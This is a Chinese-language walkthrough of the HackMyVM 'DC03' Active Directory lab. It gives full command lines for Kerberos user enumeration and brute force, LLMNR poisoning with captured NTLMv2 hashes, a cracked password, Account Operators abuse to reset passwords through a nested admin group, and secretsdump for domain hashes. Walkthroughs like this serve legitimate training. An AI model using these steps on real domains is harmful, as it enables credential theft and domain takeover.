HackMyVm-DC03 :中等

13.1 外网打点

nmap -sS -p- -T4 192.168.215.185 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'

图片[1]-HackMyVm-DC03 :中等-泷羽Sec

卧槽什么都没有,这怎么打?

nmap -sS -p 53,13487,65005 -T4 192.168.215.185 -A

图片[2]-HackMyVm-DC03 :中等-泷羽Sec

扫错了,哈哈哈哈,靶机重启,原来是我换wifi了

图片[3]-HackMyVm-DC03 :中等-泷羽Sec

再来

nmap -sS -p- -T4 192.168.215.25 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'

图片[4]-HackMyVm-DC03 :中等-泷羽Sec

nmap -sS -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49672,49685 -T4 192.168.215.25 -A

图片[5]-HackMyVm-DC03 :中等-泷羽Sec

根据上面的dc2靶场进行信息收集一波,ldap协议是开启着的,还有smb协议

enum4linux-ng -A 192.168.215.25 -C

图片[6]-HackMyVm-DC03 :中等-泷羽Sec

13.2 尝试使用匿名登录

smb匿名连接

图片[7]-HackMyVm-DC03 :中等-泷羽Sec

13.3 kerberos 用户名枚举

kerbrute userenum -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt --dc 192.168.215.25

图片[8]-HackMyVm-DC03 :中等-泷羽Sec

图片[9]-HackMyVm-DC03 :中等-泷羽Sec

charlie
administrator
wreed11
webserver

爆破smb

nxc smb 192.168.215.25 -u user -p user

图片[10]-HackMyVm-DC03 :中等-泷羽Sec

13.4 爆破 kerberos 协议

kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt wreed11
kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt charlie

三个用户接失败

图片[11]-HackMyVm-DC03 :中等-泷羽Sec

13.4 LLMNR 投毒攻击

13.4.1 具体流程

骗取目标设备的账号密码哈希,具体流程如下:

  1. 监听局域网内的 LLMNR 请求:用 Responder(你之前用过的工具)等软件,在攻击机上监听局域网内的 LLMNR 广播;
  2. 伪造响应欺骗目标:当目标设备(比如域内的员工电脑)发起 LLMNR 请求(如解析 \\共享打印机名)时,攻击机抢先回复:“我就是你要找的设备,我的 IP 是攻击机 IP”;
  3. 骗取哈希值:目标设备相信后,会试图用当前登录用户的 “NTLM 哈希” 与攻击机建立连接(比如访问共享文件夹),攻击机就能捕获到这个哈希;
  4. 破解哈希或直接用哈希登录:拿到哈希后,可通过 hashcat 破解成明文密码,或直接用 “哈希传递(PTH)” 登录其他设备。

13.4.2 如何用 LLMNR 拿到域内哈希

比如你在域渗透中,攻击机和目标域内的员工电脑在同一个网段(192.168.215.0/24):

  1. 在 Kali 上启动 Responder,开启 LLMNR 监听:
  2. 员工在电脑上误输入 \\不存在的共享名(比如 \\file-server),DNS 解析失败,触发 LLMNR 广播;
  3. Responder 捕获到这个请求,伪装成 file-server 回复员工电脑;
  4. 员工电脑用当前登录用户(比如 SOUPEDECODE\charlie)的 NTLM 哈希,尝试与攻击机建立 SMB 连接;
  5. Responder 成功捕获到 charlie 的哈希,你后续就可以用这个哈希进行 PTH 攻击,登录其他域内设备。
responder -I eth0 -wd

图片[12]-HackMyVm-DC03 :中等-泷羽Sec

这里应该是域控靶机的计划任务,所以能拿到hash

图片[13]-HackMyVm-DC03 :中等-泷羽Sec

拿到这个账号的hash,准备去爆破

图片[14]-HackMyVm-DC03 :中等-泷羽Sec

[SMB] NTLMv2-SSP Client : 240a:42c2:802:3c85:e8b7:3202:ffea:f6fd
[SMB] NTLMv2-SSP Username : SOUPEDECODE\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::SOUPEDECODE:b7c95f1435ed324f:38D48E36709F60B6B02218D61D394294:010100000000000000A791D28545DC0159ED6A549FAD342D0000000002000800330037005300330001001E00570049004E002D005500350050004500330055004F00300044004600550004003400570049004E002D005500350050004500330055004F0030004400460055002E0033003700530033002E004C004F00430041004C000300140033003700530033002E004C004F00430041004C000500140033003700530033002E004C004F00430041004C000700080000A791D28545DC010600040002000000080030003000000000000000000000000040000033BE778EBDE22DAB53FA856B26B3A1EABC23AFB04656C990D86DF46D0504C4230A0010000000000000000000000000000000000009002C0063006900660073002F0053004F005500500045004400450043004F00440045002E004C004F00430041004C000000000000000000

---

[SMB] NTLMv2-SSP Client : 240a:42c2:802:3c85:e8b7:3202:ffea:f6fd
[SMB] NTLMv2-SSP Username : soupedecode\xkate578
[SMB] NTLMv2-SSP Hash : xkate578::soupedecode:0215e15662d218c6:75CB92B3BD84CC2BA33FD7549A0D1EA4:010100000000000000A791D28545DC018EC3298268DA333B0000000002000800330037005300330001001E00570049004E002D005500350050004500330055004F00300044004600550004003400570049004E002D005500350050004500330055004F0030004400460055002E0033003700530033002E004C004F00430041004C000300140033003700530033002E004C004F00430041004C000500140033003700530033002E004C004F00430041004C000700080000A791D28545DC010600040002000000080030003000000000000000000000000040000033BE778EBDE22DAB53FA856B26B3A1EABC23AFB04656C990D86DF46D0504C4230A0010000000000000000000000000000000000009001E0063006900660073002F00460069006C0065005300650072007600650072000000000000000000

图片[15]-HackMyVm-DC03 :中等-泷羽Sec

13.5 smb渗透

找到账号密码,查看smb服务器内有什么东西

xkate578:jesuschrist
smbclient -L //192.168.215.25/ -U xkate578

图片[16]-HackMyVm-DC03 :中等-泷羽Sec

登录到share共享文件夹,发现user.txt

图片[17]-HackMyVm-DC03 :中等-泷羽Sec

尝试上传,发现这个用户有上传文件的权限

图片[18]-HackMyVm-DC03 :中等-泷羽Sec

使用evil-winrm连接失败

evil-winrm -i 192.168.215.25 -u xkate578 -p jesuschrist

图片[19]-HackMyVm-DC03 :中等-泷羽Sec

13.6 查询域内SPN关联用户

查询寻域内所有关联了SPN的用户(用于发现这些用户的TGS票据,从而破解密码)

图片[20]-HackMyVm-DC03 :中等-泷羽Sec

13.7 枚举域内用户SID

xkate578这个用户有查看域内SID信息的权限

python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/xkate578@192.168.215.25 > results.txt

图片[21]-HackMyVm-DC03 :中等-泷羽Sec

把这些用户名信息导出为一个用户字典

grep "SidTypeUser" /data/demo/results.txt | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt

图片[22]-HackMyVm-DC03 :中等-泷羽Sec

13.8 爆破 kerberos

针对域用户 xkate578 进行 “密码暴力破解” 的操作,核心目的是通过字典攻击尝试获取该用户的明文密码。

ntpdate 192.168.215.25
kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames-dup.txt xkate578 -v

图片[23]-HackMyVm-DC03 :中等-泷羽Sec

13.9 nxc爆破smb

使用nxc内网渗透神器,使用相同的账号密码爆破smb服务器,全部失败

图片[24]-HackMyVm-DC03 :中等-泷羽Sec

13.10 获取不需要预认证用户的AS-REP哈希

全部没有

impacket-GetNPUsers -dc-ip 192.168.215.25 soupedecode.local/ -usersfile target_users.txt

图片[25]-HackMyVm-DC03 :中等-泷羽Sec

利用之前得到的密码 xkate578:jesuschrist

ldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b 'DC=SOUPEDECODE,DC=LOCAL' "sAMAccountName=xkate578" memberOf > ldap_result.txt

图片[26]-HackMyVm-DC03 :中等-泷羽Sec

参数 作用
-x 使用简单认证(非 SASL 认证),适合用用户名 / 密码登录。
-H ldap://192.168.215.25 指定 LDAP 服务器地址(这里是域控的 IP)。
-D "xkate578@SOUPEDECODE.LOCAL" 绑定的用户 DN(用户名),即使用 xkate578 的凭证登录 LDAP。
-w 'jesuschrist' 绑定用户的密码(xkate578 的密码)。
-b 'DC=SOUPEDECODE,DC=LOCAL' 查询的基准 DN(域的根目录),即从整个域范围查询。
"sAMAccountName=xkate578" 过滤条件:只查询 sAMAccountName 为 xkate578 的用户(精准定位自身)。
memberOf 只返回该用户的 memberOf 字段(即所属的组)。
> ldap_result.txt 将结果输出到文件,方便查看。

从结果中可以看到这个用户属于Account Operators 组

作用:

  1. 创建 / 修改 / 删除普通域用户账号可在域内新增用户(如 testuser)、修改现有用户的属性(如密码、登录脚本、所属组等),但不能修改域管理员(Domain Admins)等高级账号
  2. 管理用户组(非特权组)可创建新的普通用户组,或修改普通组的成员(如将 zximena448 加入某个组),但不能修改 Domain AdminsEnterprise Admins 等特权组
  3. 重置普通用户密码可强制重置普通域用户的密码(无需知道原密码),例如将 zximena448 的密码改为 hacked123,进而控制该账号。
  4. 查看域内用户 / 组的详细信息比普通用户拥有更高的 LDAP 查询权限,可获取更多域内账号的属性(如密码过期时间、登录次数等)。

尝试利用net命令和这些凭证,向目标域添加一个用户,然后使用evil-winrm连接的时候,连接不上

net rpc user add "it_support" "ItSupport@123" -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.215.25

evil-winrm -i 192.168.215.25 -u it_support -p 'ItSupport@123'

图片[27]-HackMyVm-DC03 :中等-泷羽Sec

将用户添加到远程管理组即可使用evil-winrm连接

net rpc group addmem "Remote Management Users" it_support -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.215.25

evil-winrm -i 192.168.215.25 -u it_support -p 'ItSupport@123'

图片[28]-HackMyVm-DC03 :中等-泷羽Sec

那么尝试添加管理员组呢?很明显,之前已经说过了,Account Operators组的用户,可创建新的普通用户组,或修改普通组的成员(如将 zximena448 加入某个组),但不能修改 Domain AdminsEnterprise Admins 等特权组

图片[29]-HackMyVm-DC03 :中等-泷羽Sec

再看看管理员组有哪些用户,一个是Operators,一个是Administrator,两个用户属于超级管理员’

ldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b "DC=SOUPEDECODE,DC=LOCAL" "memberOf=CN=Domain Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL" sAMAccountName name

图片[30]-HackMyVm-DC03 :中等-泷羽Sec

从 LDAP 查询结果中,有几个关键线索表明 Operators 是自定义组而非 Windows 内置组:

Windows 内置操作员组都有特定的前缀:

  • Backup Operators
  • Print Operators
  • Server Operators
  • Account Operators

而这里发现

  • 组名:Operators(没有前缀)
  • 这不符合 Windows 内置组的命名规范

sAMAccountName 分析

ldif

# Operators, Users, SOUPEDECODE.LOCAL
dn: CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL
name: Operators
sAMAccountName: Operators

关键点

  • sAMAccountName: Operators(没有数字后缀)
  • Windows 内置组通常有特定的 sAMAccountName 格式
  • 例如内置的 Account Operators 的 sAMAccountName 是 Account Operators

另外

# 内置组通常在 Builtin 容器中
dn: CN=Account Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL

我们再来查看自定义组中有哪些用户

ldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b "DC=SOUPEDECODE,DC=LOCAL" "(&(objectClass=user)(memberOf=CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL))" sAMAccountName name

图片[31]-HackMyVm-DC03 :中等-泷羽Sec

# Account Operators 不能重置这些直接组成员的密码:
- 直接属于 Administrators 的用户
- 直接属于 Domain Admins 的用户

# 但可以重置这些用户的密码:
- 通过组嵌套获得管理员权限的用户
- 属于自定义管理组的用户

再不清楚,就是这个链路

Domain Admins (域管理员组)
↑ 包含
Operators (自定义管理组)
↑ 包含
fbeth103 (普通用户)

xkate578 (Account Operators) → 可以重置 fbeth103 密码

开始修改密码(回家重装了靶机,ip变了)

net rpc user password "fbeth103" "P@ssw0rd123" -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.0.102

# 或者
[root@kali] /home/kali/DC03
❯ rpcclient -U "xkate578" --password="jesuschrist" 192.168.56.126 ⏎
rpcclient $> setuserinfo2 fbeth103 23 "Pass1234!"
rpcclient $>

# 然后连接
evil-winrm -i 192.168.0.102 -u fbeth103 -p 'P@ssw0rd123'

图片[32]-HackMyVm-DC03 :中等-泷羽Sec

此时就已经得到了最后的root.txt内容

图片[33]-HackMyVm-DC03 :中等-泷羽Sec

它这个自定义既然组隶属于管理员组,那我们是不是能利用这个fbeth103用户去修改管理员的账号密码呢?现在试试

┌──(root㉿kali)-[~]
└─# net rpc user password "Administrator" "NewAdminPass123" -U "SOUPEDECODE.LOCAL/fbeth103%P@ssw0rd123" -S 192.168.0.102

┌──(root㉿kali)-[~]
└─# evil-winrm -i 192.168.0.102 -u Administrator -p 'NewAdminPass123'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
soupedecode\administrator

图片[34]-HackMyVm-DC03 :中等-泷羽Sec

成功修改!都不需要去PTH(哈希传递攻击)了

13.11 PTH攻击(hash传递)

Secretdump

获取域内hash

impacket-secretsdump 'SOUPEDECODE.LOCAL/fbeth103:P@ssw0rd123'@192.168.0.102

图片[35]-HackMyVm-DC03 :中等-泷羽Sec

图片[36]-HackMyVm-DC03 :中等-泷羽Sec

13.12 工具推荐 ldapdomaindump

除了ldapsearch工具之外,还有一个工具也可以看域内组织情况,叫做ldapdomaindump

ldapdomaindump -u "SOUPEDECODE.LOCAL\fbeth103" -p P@ssw0rd123 192.168.0.102

图片[37]-HackMyVm-DC03 :中等-泷羽Sec

在生成的domain_groups.html中也能看到Operators属于Domain Admins组

图片[38]-HackMyVm-DC03 :中等-泷羽Sec

从这里也能看到fbeth103属于Operators组

图片[39]-HackMyVm-DC03 :中等-泷羽Sec

用这个工具更为方便

13.13 DC03 域渗透总结

本次 DC03 域渗透从外网打点开始,先通过 nmap 扫描确定目标为域控制器,开启 53、88、139、445、389 等关键端口。匿名登录 SMB 失败后,用 kerbrute 枚举到 charlie、administrator 等用户,爆破无果后通过 Responder 进行 LLMNR 投毒,捕获到 xkate578 的 NTLM 哈希并破解出密码。

利用 xkate578(属 Account Operators 组)的账号管理权限,先创建影子账号并加入远程管理组,成功登录后枚举域内用户,发现自定义组 Operators 隶属于 Domain Admins,且包含用户 fbeth103。

重置 fbeth103 密码并登录,利用其间接域管理员权限,成功修改 Administrator 密码,获取域控最高权限,最终找到 root.txt,全程未依赖复杂漏洞,主要通过权限嵌套与凭据复用推进。

往期推荐

全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细

HackMyVm-DC04 :简单

HackMyVm-DC03 :简单

HackMyVm-DC02 :简单

HackMyVm-DC01 :简单

HackMyVm-TriplAdvisor :简单

HackMyVm-Runas :简单

HackMyVm-Always :简单

HackMyVm-Nessus :简单

HackMyVm-Liar :简单

HackMyVm-Simple :简单

HackMyVm-Simple :简单

HackMyVm-Zero :简单

HackMyVm-OMG :简单

新版BurpSuite v2025.6.3汉化版,附激活教程

Fine!2025最新款信息收集综合工具

若依Vue漏洞检测工具v7更新

最好用的下一代目录爆破工具,全方位的目录爆破

集成MemProcFS,Vol2和Vol3的内存取证神器

重大更新!FeatherScan v4.5 内网 linux 信息收集,提权一键梭哈神器

x-waf,一个基于fuzz的waf绕过渗透工具

这10款内网穿透工具,一定有你没用过的

红队命令速查手册

挖SRC必须知道的25个漏洞提交平台

挖SRC必须知道的25个漏洞提交平台

FeatherScan v4.0 – 一款Linux内网全自动信息收集工具

掩日-适用于红队的综合免杀工具

2025最新渗透测试靶场推荐

近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等

【内网渗透】隐藏通信隧道技术

内网渗透必备,microsocks,一个轻量级的socks代理工具

神器分享 红队快速打点工具-DarKnuclei

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路

【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏

【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!

一个永久的渗透知识库

【oscp】vulnerable_docker,三种代理方法打入内网

【内网渗透】CobaltStrike与MSF联动互相上线的方式

内网渗透必备,microsocks,一个轻量级的socks代理工具

【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!

DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程

【渗透测试】12种rbash逃逸方式总结

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路

红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学

不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学

ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略

sql注入中各种waf的绕过方式,狗,盾,神,锁,宝

利用MySQL特性,WAF绕过技巧

SQL注入绕过某狗的waf防火墙,这一篇就够了,6k文案超详细

大型翻车现场,十种waf绕过姿势,仅成功一种

喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透

本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
THE END
喜欢就支持一下吧
点赞15 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片快捷回复

    暂无评论内容